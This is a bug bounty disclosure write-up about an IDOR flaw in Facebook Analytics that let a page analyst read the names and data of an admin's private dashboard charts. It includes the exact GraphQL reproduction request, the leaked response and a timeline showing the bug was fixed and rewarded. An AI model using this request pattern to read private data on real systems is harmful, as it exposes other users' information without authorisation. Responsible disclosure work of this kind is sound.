Sarmad Hassan

Published On: 07 May 2020

Disclose Private Dashboard Chart's name and data in Facebook Analytics

IDOR
Facebook | Web
---
LOW VALID

In Facebook Analytics, you can create custom dashboards, which you can view from Dashboards. Use custom dashboards to create a customized view, or to see the information that matters to you most in one place. you can also set "its visibility" by checking on "Private" option check mark, which mean only the owner of this dashboard can see it and its contents.

Description

It is possible to disclose "Chart name and its Data" for a private dashboard (by any user who have role on the entity or page like analyst role" using an IDOR bug in the parameter called "chartID".

Impact

Page analyst could view analytics charts where the page admin had set the visibility to "owner only".




Reproduction Steps

Step
1

POST /graphql?locale=user HTTP/1.1
Host: graph.facebook.com

access_token=Analyst_ACCESS_TOKEN&fb_api_req_friendly_name=AnalyticsChartDeleteMutation&variables={"chartID":"admin private chart ID"}&doc_id=1297068037067230

Response:

{"data":{"node":{"__typename":"AnalyticsStoredAggregationChart","chartId":"admin private chart ID","chartType":"BREAKDOWN_TABLE","chartQueries":[{"__typename":"AnalyticsAggregationQuerySpec","aggregationMetric":"UNIQUE_USERS","aggregationMetricParams":[],"aggregationPeriod":"RANGE","breakdowns":["$fb.age"],"dateRange":{"type":"LAST_28_DAYS","since_iso_date":null,"until_iso_date":null},"displayName":null,"eventName":"fb_pages_post_reaction","orderingColumns":[],"orderingType":"DESCENDING","limit":0,"segment":{"__typename":"AnalyticsAdhocFilterSetListing","name":null,"serializedFilter":"{\"event_rules\":[],\"demographic_rules\":[],\"device_rules\":[],\"percentile_rules\":[],\"user_property_rules\":[],\"web_param_rules\":[]}","filter_json":"{}"},"tag":"CHART"}],"description":"","title":"private chart name","segmentBehavior":"USE_LOCAL","chartAnnotations":[],"errorBounds":[],"goal":null,"id":"id"}},"extensions":{"is_final":true}}

My Notes

* When it comes to logical bugs like IDOR, always check for Sub-options, because sometimes developers protect only the main option and forget about Sub-option just like in our case here where "Chart info" was the sub-option of the main option "Dashboard"

Videos

Timeline
.
Sarmad 17 Feb 2020

Initial Report

.
Facebook 26 Feb 2020

Report Triaged

.
Facebook 08 Mar 2020

Report Fixed

.
Sarmad 08 Mar 2020

Fixed Confirmed

.
Facebook 02 Apr 2020

Bounty awarded

VALID






Show All Images